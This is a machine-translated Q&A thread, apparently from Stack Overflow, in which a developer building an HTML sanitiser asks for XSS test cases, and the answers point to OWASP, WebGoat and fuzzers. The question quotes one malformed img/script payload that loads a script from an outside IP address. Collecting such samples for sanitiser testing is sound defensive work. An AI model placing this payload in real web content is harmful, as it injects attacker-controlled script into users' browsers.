XSS Torture Test-存在しますか？

Question

html sanitiserを書きたいと思っていますが、明らかにそれが正しく動作することをテスト/証明するために、パフォーマンスを確認するためにそれに対抗するための一連のXSSサンプルが必要です。 コーディングホラーの素敵な例

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

MIME拷問テストがあることを知っています。 Mimeデコーダーのテストに使用される添付ファイル付きの電子メール（適切にデコードできれば、動作することが証明されています）。私は基本的にXSSに相当するもの、つまり、正常に動作することを確認するためにサニタイザーに投げかけることができる危険なhtmlの例のリストを探しています。

サニタイザーの作成方法に関する優れたリソース（つまり、人々が使用しようとする一般的な悪用など）があれば、彼らも感謝されます。

事前に感謝します：-）

編集：これが以前に明確でなかった場合は申し訳ありませんが、ブラウザなどでテストするのではなく、サニタイザーの単体テストを書くことができるように、一連の拷問テストを行った後です。ブラウザだけでなくどこからでも。

Answer 1

このXSSチートリストをご覧ください： https://www.owasp.org/ index.php / XSS_Filter_Evasion_Cheat_Sheet

Answer 2

XSS Me は、実行可能な素晴らしいFirefoxプラグインです。消毒剤。

Answer 3

OWASP をご覧ください。 XSSの仕組み、探す対象、さらには WebGoat プロジェクト。脆弱なサイトで試してみることができます。

Answer 4

Jesse Rudermanのjsfunfuzz（ http：//www.squarefreeを試すことができます。 .com / 2007/08/02 / introducing-jsfunfuzz / ）は、Javascriptでランダムデータを破壊しようとしています。 Firefoxチームはこれを大成功で使用しているようです。